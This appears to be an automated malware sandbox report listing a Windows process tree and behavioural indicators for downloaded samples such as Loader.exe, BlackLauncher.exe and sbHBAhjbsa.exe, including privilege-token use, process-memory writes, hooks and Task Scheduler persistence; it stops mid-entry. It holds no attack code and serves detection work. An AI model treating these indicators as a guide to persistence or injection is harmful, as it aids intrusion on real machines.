File opened for modification	C:\Users\Admin\Downloads\sbHBAhjbsa.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\nb3ce1n9msom.rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\nb3ce1n9msom (1).rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 590559.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Loader.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 139599.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 4 IoCs

pid	Process
2912	WINWORD.EXE
2912	WINWORD.EXE
6972	Loader (1).exe
776	Loader.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
240	chrome.exe
240	chrome.exe
1260	chrome.exe
1260	chrome.exe
1260	chrome.exe
1260	chrome.exe
3776	msedge.exe
3776	msedge.exe
572	msedge.exe
572	msedge.exe
4648	msedge.exe
4648	msedge.exe
4056	msedge.exe
4056	msedge.exe
3080	identity_helper.exe
3080	identity_helper.exe
3248	msedge.exe
3248	msedge.exe
3000	msedge.exe
3000	msedge.exe
3704	msedge.exe
3704	msedge.exe
2624	msedge.exe
2624	msedge.exe
2624	msedge.exe
2624	msedge.exe
1172	powershell.exe
1172	powershell.exe
1172	powershell.exe
2760	powershell.exe
2760	powershell.exe
2760	powershell.exe
2872	powershell.exe
2872	powershell.exe
2872	powershell.exe
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
4948	TDoZSSz.exe
280	powershell.exe
280	powershell.exe
280	powershell.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
4948	TDoZSSz.exe
3704	Updater.exe
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe
3704	Updater.exe
3704	Updater.exe
3704	Updater.exe
3704	Updater.exe
3704	Updater.exe
3704	Updater.exe
3704	Updater.exe
3704	Updater.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
688	Process not Found
688	Process not Found
688	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2864	sbHBAhjbsa.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe
Token: SeCreatePagefilePrivilege	240	chrome.exe
Token: SeShutdownPrivilege	240	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
3376	firefox.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe

Suspicious use of SendNotifyMessage 36 IoCs

pid	Process
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
240	chrome.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
572	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe
4892	msedge.exe

Suspicious use of SetWindowsHookEx 38 IoCs

pid	Process
3376	firefox.exe
3100	OpenWith.exe
4988	OpenWith.exe
3100	OpenWith.exe
3100	OpenWith.exe
3912	OpenWith.exe
3912	OpenWith.exe
3912	OpenWith.exe
440	BlackLauncher.exe
440	BlackLauncher.exe
440	BlackLauncher.exe
3908	BlackLauncher.exe
3908	BlackLauncher.exe
3908	BlackLauncher.exe
2912	WINWORD.EXE
2912	WINWORD.EXE
2912	WINWORD.EXE
2912	WINWORD.EXE
2912	WINWORD.EXE
2912	WINWORD.EXE
2912	WINWORD.EXE
2912	WINWORD.EXE
2912	WINWORD.EXE
2100	BlackLauncher.exe
2100	BlackLauncher.exe
2100	BlackLauncher.exe
5116	BlackLauncher.exe
5116	BlackLauncher.exe
5116	BlackLauncher.exe
6440	Loader.exe
4744	Loader.exe
5948	OpenWith.exe
6972	Loader (1).exe
6492	OpenWith.exe
6972	Loader (1).exe
776	Loader.exe
776	Loader.exe
5780	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 240 wrote to memory of 3164	240	chrome.exe	85
PID 240 wrote to memory of 3164	240	chrome.exe	85
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 2904	240	chrome.exe	86
PID 240 wrote to memory of 1920	240	chrome.exe	87
PID 240 wrote to memory of 1920	240	chrome.exe	87
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88
PID 240 wrote to memory of 1040	240	chrome.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\sbHBAhjbsa.exe
"C:\Users\Admin\AppData\Local\Temp\sbHBAhjbsa.exe"
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9573cc40,0x7ffd9573cc4c,0x7ffd9573cc58
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1824 /prefetch:2
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1832,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1868 /prefetch:3
  2⤵
  PID:1920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2168 /prefetch:8
  2⤵
  PID:1040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3116 /prefetch:1
  2⤵
  PID:1868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:4200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4696,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4704 /prefetch:8
  2⤵
  PID:3324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4748 /prefetch:8
  2⤵
  PID:792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4640,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4912 /prefetch:1
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4908,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4612 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4856,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4972 /prefetch:1
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3440,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=872 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3404,i,16006544893054074234,6596334255737680865,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:1828

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:3576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4232

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2784
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1948 -parentBuildID 20240401114208 -prefsHandle 1876 -prefMapHandle 1868 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {84d79658-232c-4574-b7dc-9694fca9aa59} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" gpu
    3⤵
    PID:1464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2348 -parentBuildID 20240401114208 -prefsHandle 2340 -prefMapHandle 2336 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cafd7a7d-0e3e-4f8c-9223-7db2a394fa46} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" socket
    3⤵
    - Checks processor information in registry
    PID:568
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 3284 -prefMapHandle 3188 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05eba14a-9b4f-45fc-a9a1-d2dedbe79244} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" tab
    3⤵
    PID:3180
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -childID 2 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca06753-3c7d-4e41-8cfc-4fbc9c6646dd} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" tab
    3⤵
    PID:3440
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4844 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4828 -prefMapHandle 4852 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6c2a193-7da4-4e93-b7e2-4b4ca93d5909} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" utility
    3⤵
    - Checks processor information in registry
    PID:2868
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5356 -childID 3 -isForBrowser -prefsHandle 5348 -prefMapHandle 5344 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa065c79-cb30-4373-bafd-9a611dbd6c47} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" tab
    3⤵
    PID:1852
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 4 -isForBrowser -prefsHandle 5496 -prefMapHandle 5500 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1f1d534-2c86-421b-b3b2-93967fb7840b} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" tab
    3⤵
    PID:1476
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5776 -childID 5 -isForBrowser -prefsHandle 5768 -prefMapHandle 5764 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99412e3d-ce47-49d3-9ba0-a916ec042798} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" tab
    3⤵
    PID:976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5872 -childID 6 -isForBrowser -prefsHandle 5500 -prefMapHandle 5684 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {994a8aa7-928d-4b6b-bfdd-38c2a91b13ba} 3376 "\\.\pipe\gecko-crash-server-pipe.3376" tab
    3⤵
    PID:1608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd95aa3cb8,0x7ffd95aa3cc8,0x7ffd95aa3cd8
  2⤵
  PID:1360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:1732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
